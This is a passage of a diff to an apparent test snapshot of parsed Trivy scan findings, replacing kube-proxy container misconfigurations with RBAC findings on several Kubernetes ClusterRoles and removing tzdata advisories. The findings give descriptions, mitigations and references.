"https://www.debian.org/security/2022/dsa-5111", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/admin' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV056", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv056", + ], + }, + "category": "Misconfiguration", + "description": "The ability to control which pods get service traffic directed to them allows for interception attacks. Controlling network policy allows for bypassing lateral movement restrictions.", + "location": "scb://trivy/?Kind=ClusterRole&Name=admin", + "mitigation": "Networking resources are only allowed for verbs 'list', 'watch', 'get'", + "name": "Do not allow management of networking resources(ClusterRole 'admin' should not have access to resources ["services", "endpoints", "endpointslices", "networkpolicies", "ingresses"] for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", + "references": [ { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2022/03/24/1", + "value": "https://avd.aquasec.com/misconfig/ksv056", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2022/03/28/1", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/admin' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV056", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv056", + ], + }, + "category": "Misconfiguration", + "description": "The ability to control which pods get service traffic directed to them allows for interception attacks. Controlling network policy allows for bypassing lateral movement restrictions.", + "location": "scb://trivy/?Kind=ClusterRole&Name=admin", + "mitigation": "Networking resources are only allowed for verbs 'list', 'watch', 'get'", + "name": "Do not allow management of networking resources(ClusterRole 'admin' should not have access to resources ["services", "endpoints", "endpointslices", "networkpolicies", "ingresses"] for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", + "references": [ { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2022/03/28/3", + "value": "https://avd.aquasec.com/misconfig/ksv056", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujul2022.html", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, ], "severity": "HIGH", @@ -169377,86 +170051,86 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'DaemonSet/kube-proxy' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV001", + "foundIn": "Target: 'ClusterRole/edit' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV041", "installedVersion": undefined, "packageName": undefined, "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv001", + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv041", ], }, "category": "Misconfiguration", - "description": "A program inside the container can elevate its own privileges and run as root, which might give the program control over the container and node.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": "Set 'set containers[].securityContext.allowPrivilegeEscalation' to 'false'.", - "name": "Process can elevate its own privileges(Container 'kube-proxy' of DaemonSet 'kube-proxy' should set 'securityContext.allowPrivilegeEscalation' to false)", + "description": "Check whether role permits managing secrets", + "location": "scb://trivy/?Kind=ClusterRole&Name=edit", + "mitigation": "Create a role which does not permit to manage secrets if not needed", + "name": "Do not allow management of secrets(Role permits management of secret(s))", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv001", + "value": "https://avd.aquasec.com/misconfig/ksv041", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'DaemonSet/kube-proxy' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV003", + "foundIn": "Target: 'ClusterRole/edit' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV041", "installedVersion": undefined, "packageName": undefined, "references": [ - "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", - "https://avd.aquasec.com/misconfig/ksv003", + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv041", ], }, "category": "Misconfiguration", - "description": "The container should drop all default capabilities and add only those that are needed for its execution.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": "Add 'ALL' to containers[].securityContext.capabilities.drop.", - "name": "Default capabilities not dropped(Container 'kube-proxy' of DaemonSet 'kube-proxy' should add 'ALL' to 'securityContext.capabilities.drop')", + "description": "Check whether role permits managing secrets", + "location": "scb://trivy/?Kind=ClusterRole&Name=edit", + "mitigation": "Create a role which does not permit to manage secrets if not needed", + "name": "Do not allow management of secrets(Role permits management of secret(s))", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv003", + "value": "https://avd.aquasec.com/misconfig/ksv041", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'DaemonSet/kube-proxy' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV009", + "foundIn": "Target: 'ClusterRole/edit' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV048", "installedVersion": undefined, "packageName": undefined, "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", - "https://avd.aquasec.com/misconfig/ksv009", + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv048", ], }, "category": "Misconfiguration", - "description": "Sharing the host’s network namespace permits processes in the pod to communicate with processes bound to the host’s loopback adapter.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": "Do not set 'spec.template.spec.hostNetwork' to true.", - "name": "Access to host network(DaemonSet 'kube-proxy' should not set 'spec.template.spec.hostNetwork' to true)", + "description": "Check whether role permits update/create of a malicious pod", + "location": "scb://trivy/?Kind=ClusterRole&Name=edit", + "mitigation": "Create a role which does not permit update/create of a malicious pod", + "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv009", + "value": "https://avd.aquasec.com/misconfig/ksv048", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, ], "severity": "HIGH", @@ -169464,173 +170138,173 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'DaemonSet/kube-proxy' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV011", + "foundIn": "Target: 'ClusterRole/edit' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV048", "installedVersion": undefined, "packageName": undefined, "references": [ - "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", - "https://avd.aquasec.com/misconfig/ksv011", + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv048", ], }, "category": "Misconfiguration", - "description": "Enforcing CPU limits prevents DoS via resource exhaustion.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": "Set a limit value under 'containers[].resources.limits.cpu'.", - "name": "CPU not limited(Container 'kube-proxy' of DaemonSet 'kube-proxy' should set 'resources.limits.cpu')", + "description": "Check whether role permits update/create of a malicious pod", + "location": "scb://trivy/?Kind=ClusterRole&Name=edit", + "mitigation": "Create a role which does not permit update/create of a malicious pod", + "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv011", + "value": "https://avd.aquasec.com/misconfig/ksv048", }, { "type": "URL", - "value": "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'DaemonSet/kube-proxy' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV012", + "foundIn": "Target: 'ClusterRole/edit' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV048", "installedVersion": undefined, "packageName": undefined, "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv012", + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv048", ], }, "category": "Misconfiguration", - "description": "'runAsNonRoot' forces the running image to run as a non-root user to ensure least privileges.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": "Set 'containers[].securityContext.runAsNonRoot' to true.", - "name": "Runs as root user(Container 'kube-proxy' of DaemonSet 'kube-proxy' should set 'securityContext.runAsNonRoot' to true)", + "description": "Check whether role permits update/create of a malicious pod", + "location": "scb://trivy/?Kind=ClusterRole&Name=edit", + "mitigation": "Create a role which does not permit update/create of a malicious pod", + "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv012", + "value": "https://avd.aquasec.com/misconfig/ksv048", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'DaemonSet/kube-proxy' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV014", + "foundIn": "Target: 'ClusterRole/edit' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV048", "installedVersion": undefined, "packageName": undefined, "references": [ - "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", - "https://avd.aquasec.com/misconfig/ksv014", + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv048", ], }, "category": "Misconfiguration", - "description": "An immutable root file system prevents applications from writing to their local disk. This can limit intrusions, as attackers will not be able to tamper with the file system or write foreign executables to disk.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": "Change 'containers[].securityContext.readOnlyRootFilesystem' to 'true'.", - "name": "Root file system is not read-only(Container 'kube-proxy' of DaemonSet 'kube-proxy' should set 'securityContext.readOnlyRootFilesystem' to true)", + "description": "Check whether role permits update/create of a malicious pod", + "location": "scb://trivy/?Kind=ClusterRole&Name=edit", + "mitigation": "Create a role which does not permit update/create of a malicious pod", + "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv014", + "value": "https://avd.aquasec.com/misconfig/ksv048", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'DaemonSet/kube-proxy' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV015", + "foundIn": "Target: 'ClusterRole/edit' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV049", "installedVersion": undefined, "packageName": undefined, "references": [ - "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", - "https://avd.aquasec.com/misconfig/ksv015", + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv049", ], }, "category": "Misconfiguration", - "description": "When containers have resource requests specified, the scheduler can make better decisions about which nodes to place pods on, and how to deal with resource contention.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": "Set 'containers[].resources.requests.cpu'.", - "name": "CPU requests not specified(Container 'kube-proxy' of DaemonSet 'kube-proxy' should set 'resources.requests.cpu')", + "description": "Some workloads leverage configmaps to store sensitive data or configuration parameters that affect runtime behavior that can be modified by an attacker or combined with another issue to potentially lead to compromise.", + "location": "scb://trivy/?Kind=ClusterRole&Name=edit", + "mitigation": "Remove write permission verbs for resource 'configmaps'", + "name": "Do not allow management of configmaps(ClusterRole 'edit' should not have access to resource 'configmaps' for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv015", + "value": "https://avd.aquasec.com/misconfig/ksv049", }, { "type": "URL", - "value": "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, ], - "severity": "LOW", + "severity": "MEDIUM", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'DaemonSet/kube-proxy' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV016", + "foundIn": "Target: 'ClusterRole/edit' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV056", "installedVersion": undefined, "packageName": undefined, "references": [ - "https://kubesec.io/basics/containers-resources-limits-memory/", - "https://avd.aquasec.com/misconfig/ksv016", + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv056", ], }, "category": "Misconfiguration", - "description": "When containers have memory requests specified, the scheduler can make better decisions about which nodes to place pods on, and how to deal with resource contention.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": "Set 'containers[].resources.requests.memory'.", - "name": "Memory requests not specified(Container 'kube-proxy' of DaemonSet 'kube-proxy' should set 'resources.requests.memory')", + "description": "The ability to control which pods get service traffic directed to them allows for interception attacks. Controlling network policy allows for bypassing lateral movement restrictions.", + "location": "scb://trivy/?Kind=ClusterRole&Name=edit", + "mitigation": "Networking resources are only allowed for verbs 'list', 'watch', 'get'", + "name": "Do not allow management of networking resources(ClusterRole 'edit' should not have access to resources ["services", "endpoints", "endpointslices", "networkpolicies", "ingresses"] for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv016", + "value": "https://avd.aquasec.com/misconfig/ksv056", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-resources-limits-memory/", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'DaemonSet/kube-proxy' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV017", + "foundIn": "Target: 'ClusterRole/edit' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV056", "installedVersion": undefined, "packageName": undefined, "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", - "https://avd.aquasec.com/misconfig/ksv017", + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv056", ], }, "category": "Misconfiguration", - "description": "Privileged containers share namespaces with the host system and do not offer any security. They should be used exclusively for system containers that require high privileges.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": "Change 'containers[].securityContext.privileged' to 'false'.", - "name": "Privileged container(Container 'kube-proxy' of DaemonSet 'kube-proxy' should set 'securityContext.privileged' to false)", + "description": "The ability to control which pods get service traffic directed to them allows for interception attacks. Controlling network policy allows for bypassing lateral movement restrictions.", + "location": "scb://trivy/?Kind=ClusterRole&Name=edit", + "mitigation": "Networking resources are only allowed for verbs 'list', 'watch', 'get'", + "name": "Do not allow management of networking resources(ClusterRole 'edit' should not have access to resources ["services", "endpoints", "endpointslices", "networkpolicies", "ingresses"] for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv017", + "value": "https://avd.aquasec.com/misconfig/ksv056", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, ], "severity": "HIGH", @@ -169638,176 +170312,176 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'DaemonSet/kube-proxy' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV018", + "foundIn": "Target: 'ClusterRole/edit' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV056", "installedVersion": undefined, "packageName": undefined, "references": [ - "https://kubesec.io/basics/containers-resources-limits-memory/", - "https://avd.aquasec.com/misconfig/ksv018", + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv056", ], }, "category": "Misconfiguration", - "description": "Enforcing memory limits prevents DoS via resource exhaustion.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": "Set a limit value under 'containers[].resources.limits.memory'.", - "name": "Memory not limited(Container 'kube-proxy' of DaemonSet 'kube-proxy' should set 'resources.limits.memory')", + "description": "The ability to control which pods get service traffic directed to them allows for interception attacks. Controlling network policy allows for bypassing lateral movement restrictions.", + "location": "scb://trivy/?Kind=ClusterRole&Name=edit", + "mitigation": "Networking resources are only allowed for verbs 'list', 'watch', 'get'", + "name": "Do not allow management of networking resources(ClusterRole 'edit' should not have access to resources ["services", "endpoints", "endpointslices", "networkpolicies", "ingresses"] for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv018", + "value": "https://avd.aquasec.com/misconfig/ksv056", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-resources-limits-memory/", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'DaemonSet/kube-proxy' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV020", + "foundIn": "Target: 'ClusterRole/securecodebox-manager-role' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV048", "installedVersion": undefined, "packageName": undefined, "references": [ - "https://kubesec.io/basics/containers-securitycontext-runasuser/", - "https://avd.aquasec.com/misconfig/ksv020", + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv048", ], }, "category": "Misconfiguration", - "description": "Force the container to run with user ID > 10000 to avoid conflicts with the host’s user table.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": "Set 'containers[].securityContext.runAsUser' to an integer > 10000.", - "name": "Runs with low user ID(Container 'kube-proxy' of DaemonSet 'kube-proxy' should set 'securityContext.runAsUser' > 10000)", + "description": "Check whether role permits update/create of a malicious pod", + "location": "scb://trivy/?Kind=ClusterRole&Name=securecodebox-manager-role", + "mitigation": "Create a role which does not permit update/create of a malicious pod", + "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv020", + "value": "https://avd.aquasec.com/misconfig/ksv048", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'DaemonSet/kube-proxy' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV021", + "foundIn": "Target: 'ClusterRole/securecodebox-manager-role' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV050", "installedVersion": undefined, "packageName": undefined, "references": [ - "https://kubesec.io/basics/containers-securitycontext-runasuser/", - "https://avd.aquasec.com/misconfig/ksv021", + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv050", ], }, "category": "Misconfiguration", - "description": "Force the container to run with group ID > 10000 to avoid conflicts with the host’s user table.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": "Set 'containers[].securityContext.runAsGroup' to an integer > 10000.", - "name": "Runs with low group ID(Container 'kube-proxy' of DaemonSet 'kube-proxy' should set 'securityContext.runAsGroup' > 10000)", + "description": "An effective level of access equivalent to cluster-admin should not be provided.", + "location": "scb://trivy/?Kind=ClusterRole&Name=securecodebox-manager-role", + "mitigation": "Remove write permission verbs for resource 'roles' and 'rolebindings'", + "name": "Do not allow management of RBAC resources(ClusterRole 'securecodebox-manager-role' should not have access to resources ["roles", "rolebindings"] for verbs ["create", "update", "delete", "deletecollection", "impersonate", "*"])", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv021", + "value": "https://avd.aquasec.com/misconfig/ksv050", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'DaemonSet/kube-proxy' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV023", + "foundIn": "Target: 'ClusterRole/securecodebox-manager-role' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV050", "installedVersion": undefined, "packageName": undefined, "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", - "https://avd.aquasec.com/misconfig/ksv023", + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv050", ], }, "category": "Misconfiguration", - "description": "HostPath volumes must be forbidden.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": "Do not set 'spec.volumes[*].hostPath'.", - "name": "hostPath volumes mounted(DaemonSet 'kube-proxy' should not set 'spec.template.volumes.hostPath')", + "description": "An effective level of access equivalent to cluster-admin should not be provided.", + "location": "scb://trivy/?Kind=ClusterRole&Name=securecodebox-manager-role", + "mitigation": "Remove write permission verbs for resource 'roles' and 'rolebindings'", + "name": "Do not allow management of RBAC resources(ClusterRole 'securecodebox-manager-role' should not have access to resources ["roles", "rolebindings"] for verbs ["create", "update", "delete", "deletecollection", "impersonate", "*"])", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv023", + "value": "https://avd.aquasec.com/misconfig/ksv050", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'DaemonSet/kube-proxy' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV030", + "foundIn": "Target: 'ClusterRole/local-path-provisioner-role' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV045", "installedVersion": undefined, "packageName": undefined, "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv030", + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv045", ], }, "category": "Misconfiguration", - "description": "The RuntimeDefault/Localhost seccomp profile must be required, or allow specific additional profiles.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": "Set 'spec.securityContext.seccompProfile.type', 'spec.containers[*].securityContext.seccompProfile' and 'spec.initContainers[*].securityContext.seccompProfile' to 'RuntimeDefault' or undefined.", - "name": "Default Seccomp profile not set(Either Pod or Container should set 'securityContext.seccompProfile.type' to 'RuntimeDefault')", + "description": "Check whether role permits wildcard verb on specific resources", + "location": "scb://trivy/?Kind=ClusterRole&Name=local-path-provisioner-role", + "mitigation": "Create a role which does not permit wildcard verb on specific resources", + "name": "No wildcard verb roles(Role permits wildcard verb on specific resources)", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv030", + "value": "https://avd.aquasec.com/misconfig/ksv045", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'DaemonSet/kube-proxy' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV106", + "foundIn": "Target: 'ClusterRole/local-path-provisioner-role' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV056", "installedVersion": undefined, "packageName": undefined, "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv106", + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv056", ], }, "category": "Misconfiguration", - "description": "Containers must drop ALL capabilities, and are only permitted to add back the NET_BIND_SERVICE capability.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": "Set 'spec.containers[*].securityContext.capabilities.drop' to 'ALL' and only add 'NET_BIND_SERVICE' to 'spec.containers[*].securityContext.capabilities.add'.", - "name": "Container capabilities must only include NET_BIND_SERVICE(container should drop all)", + "description": "The ability to control which pods get service traffic directed to them allows for interception attacks. Controlling network policy allows for bypassing lateral movement restrictions.", + "location": "scb://trivy/?Kind=ClusterRole&Name=local-path-provisioner-role", + "mitigation": "Networking resources are only allowed for verbs 'list', 'watch', 'get'", + "name": "Do not allow management of networking resources(ClusterRole 'local-path-provisioner-role' should not have access to resources ["services", "endpoints", "endpointslices", "networkpolicies", "ingresses"] for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv106", + "value": "https://avd.aquasec.com/misconfig/ksv056", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { @@ -170128,456 +170802,6 @@ commonly used by applications.", ], "severity": "HIGH", }, - { - "attributes": { - "fixedVersion": "2020d-0+deb9u1", - "foundIn": "Target: 'k8s.gcr.io/etcd:3.4.13-0 (debian 9.13)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "DLA-2424-1", - "installedVersion": "2020a-0+deb9u1", - "packageName": "tzdata", - "references": undefined, - }, - "category": "Vulnerability", - "description": undefined, - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", - "mitigation": undefined, - "name": "tzdata - new upstream version", - "references": [], - "severity": "INFORMATIONAL", - }, - { - "attributes": { - "fixedVersion": "2020e-0+deb9u1", - "foundIn": "Target: 'k8s.gcr.io/etcd:3.4.13-0 (debian 9.13)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "DLA-2509-1", - "installedVersion": "2020a-0+deb9u1", - "packageName": "tzdata", - "references": undefined, - }, - "category": "Vulnerability", - "description": undefined, - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", - "mitigation": undefined, - "name": "tzdata - new upstream version", - "references": [], - "severity": "INFORMATIONAL", - }, - { - "attributes": { - "fixedVersion": "2021a-0+deb9u1", - "foundIn": "Target: 'k8s.gcr.io/etcd:3.4.13-0 (debian 9.13)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "DLA-2542-1", - "installedVersion": "2020a-0+deb9u1", - "packageName": "tzdata", - "references": undefined, - }, - "category": "Vulnerability", - "description": undefined, - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", - "mitigation": undefined, - "name": "tzdata - new upstream version", - "references": [], - "severity": "INFORMATIONAL", - }, - { - "attributes": { - "fixedVersion": "2021a-0+deb9u2", - "foundIn": "Target: 'k8s.gcr.io/etcd:3.4.13-0 (debian 9.13)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "DLA-2797-1", - "installedVersion": "2020a-0+deb9u1", - "packageName": "tzdata", - "references": undefined, - }, - "category": "Vulnerability", - "description": undefined, - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", - "mitigation": undefined, - "name": "tzdata - new upstream version", - "references": [], - "severity": "INFORMATIONAL", - }, - { - "attributes": { - "fixedVersion": "2021a-0+deb9u3", - "foundIn": "Target: 'k8s.gcr.io/etcd:3.4.13-0 (debian 9.13)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "DLA-2963-1", - "installedVersion": "2020a-0+deb9u1", - "packageName": "tzdata", - "references": undefined, - }, - "category": "Vulnerability", - "description": undefined, - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", - "mitigation": undefined, - "name": "tzdata - new timezone database", - "references": [], - "severity": "INFORMATIONAL", - }, - { - "attributes": { - "fixedVersion": "2021a-0+deb9u4", - "foundIn": "Target: 'k8s.gcr.io/etcd:3.4.13-0 (debian 9.13)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "DLA-3051-1", - "installedVersion": "2020a-0+deb9u1", - "packageName": "tzdata", - "references": undefined, - }, - "category": 